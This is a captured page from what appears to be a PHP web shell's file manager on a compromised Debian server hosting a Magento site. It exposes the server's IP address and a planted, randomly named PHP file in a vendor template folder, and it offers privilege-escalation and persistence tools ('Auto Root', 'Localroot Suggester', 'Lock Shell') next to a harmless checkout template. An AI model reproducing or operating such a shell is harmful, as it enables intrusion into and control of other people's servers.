Linux hezamn03 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64
Apache/2.4.62 (Debian)
Server IP : 5.9.117.19 & Your IP : 216.73.216.40
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
var /
www /
html /
amitamin.com.old /
vendor /
aheadworks /
module-afptc /
view /
frontend /
templates /
multishipping /
checkout /
Delete
Unzip
Name
Size
Permission
Date
Action
aJz14002x.php
102.26
KB
-r--r--r--
2025-11-02 05:54
addresses.phtml
674
B
-rw-rw-r--
2021-10-11 14:41
Save
Rename
<?php // @codingStandardsIgnoreFile /** @var $block \Aheadworks\Afptc\Block\Multishipping\Checkout\Addresses */ $dependencies = $block->getDependencies(); ?> <?php if (!empty($dependencies)): ?> <div class="field message message-notice notice"> <p> <?php foreach ($dependencies as $dependency): ?> <?= /* @noEscape */ $block->escapeHtml($dependency['promo']) ?> can only be shipped together with <?= /* @noEscape */ $block->escapeHtml($dependency['main']) ?>. <?php endforeach; ?> Shipping to a different address will cancel its discount </p> </div> <?php endif; ?>